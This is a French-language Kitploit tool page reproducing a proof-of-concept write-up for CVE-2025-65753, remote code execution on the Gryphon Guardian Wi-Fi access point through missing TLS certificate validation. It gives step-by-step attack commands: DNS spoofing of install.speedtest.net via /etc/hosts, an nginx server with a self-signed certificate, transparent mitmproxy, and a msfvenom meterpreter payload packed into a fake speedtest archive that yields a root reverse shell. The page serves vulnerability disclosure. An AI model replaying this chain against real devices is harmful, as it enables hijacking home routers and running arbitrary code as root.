Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-65753 — Preuve de concept d'exploit pour CVE-2025-65753 : exécution de code à distance sur le point d'accès Gryphon Guardian via une validation incorrecte des certificats TLS, permettant des attaques MitM et d'usurpation DNS. | Kitploit
Outils/GitHubGitHub/diegovargasj/cve-2025-65753
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubdiegovargasj/cve-2025-65753

CVE-2025-65753

Preuve de concept d'exploit pour CVE-2025-65753 : exécution de code à distance sur le point d'accès Gryphon Guardian via une validation incorrecte des certificats TLS, permettant des attaques MitM et d'usurpation DNS.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-65753

Preuve de concept pour CVE-2025-65753 : Exécution de code à distance sur le point d'accès Gryphon Guardian, version de firmware 01.06.0006.22, due à une validation incorrecte du certificat TLS.

Description

Le point d'accès WiFi Gryphon Guardian, avec la version de firmware 01.06.0006.22, ne valide pas correctement le certificat TLS d'un client de test de vitesse internet téléchargé après y avoir été invité via l'application. Cette faille permet à un attaquant d'intercepter et de manipuler la communication, en injectant au client un code malveillant qui est ensuite exécuté en tant que root par le point d'accès.

PoC

Il y a 2 façons d'exploiter cette vulnérabilité :

  • Via une attaque MitM, en interceptant directement la communication entre le point d'accès et le serveur
  • En usurpant les réponses DNS et en se faisant passer pour le serveur

Pour les besoins de cette PoC, le trafic du point d'accès est routé via l'ordinateur de l'attaquant (essentiellement une attaque MitM), en pontant 2 interfaces réseau, comme le montre ce schéma.

Diagram

Pour ce faire, tout en redirigeant le trafic TCP vers le port local 9900 pour analyse, j'ai utilisé mon propre outil : https://github.com/diegovargasj/bridge-interfaces

Bridge Interfaces

Ensuite, j'ai utilisé l'outil certmitm de aapooksman (https://github.com/aapooksman/certmitm) pour analyser les connexions TLS et déployer automatiquement plusieurs attaques afin de tester la validation du certificat. Cela révèle plusieurs failles sur plusieurs serveurs. Celle qui a retenu mon attention était le téléchargement du client speedtest depuis qui peut être intercepté avec un simple certificat auto-signé.

https://install.speedtest.net/app/cli/ookla-speedtest-1.2.0-linux-armhf.tgz

certmitm

L'archive contient un ELF compilé pour ARM 32 bits, qui est clairement téléchargé, décompressé et exécuté par l'appareil.

Downloaded file

L'appareil ne valide pas le certificat TLS pour l'authenticité, puisqu'il accepte volontiers un simple certificat auto-signé. Ainsi, en déployant un serveur HTTPS et en usurpant les réponses DNS pour install.speedtest.net, vous pouvez servir n'importe quel exécutable de votre choix. Pour ce faire, utilisez simplement la configuration nginx suivante :

root@kitploit:~
server {
    listen 443 ssl default_server;
    server_name install.speedtest.net;

    ssl_certificate /path/to/self_signed_cert.pem;
    ssl_certificate_key /path/to/self_signed_key.pem;

    root /path/to/webroot;
}

Ensuite, ajoutez la ligne suivante à votre fichier /etc/hosts, pour usurper les réponses DNS via dnsmasq.

root@kitploit:~
192.168.0.15    install.speedtest.net

Enfin, redémarrez le script bridge-interfaces.sh, tuez certmitm.py et exécutez mitmproxy :

root@kitploit:~
mitmproxy --listen-host 192.168.0.15 --listen-port 9900 --mode transparent -k

Maintenant, nous avons seulement besoin de la charge utile. Puisque le point d'accès a Python installé, un simple script meterpreter suffira. Créez le script avec msfvenom :

msfvenom

Remplacez l'ELF original du client speedtest par un script bash pour appeler la charge utile :

root@kitploit:~
python payload.py

Et empaquetez-le dans une archive tar, avec le chemin approprié pour qu'il corresponde à la requête web vers https://install.speedtest.net/app/cli/ookla-speedtest-1.2.0-linux-armhf.tgz :

root@kitploit:~
tar -czvf ookla-speedtest-1.2.0-linux-armhf.tgz speedtest payload.py

Maintenant, nous configurons l'écouteur meterpreter. Après avoir appelé le test de vitesse depuis l'application Gryphon, nous obtenons le shell inversé en tant que root.

Meterpreter

Et nous pouvons exécuter des commandes arbitraires dans le point d'accès.

Reverse shell

Télécharger l’outil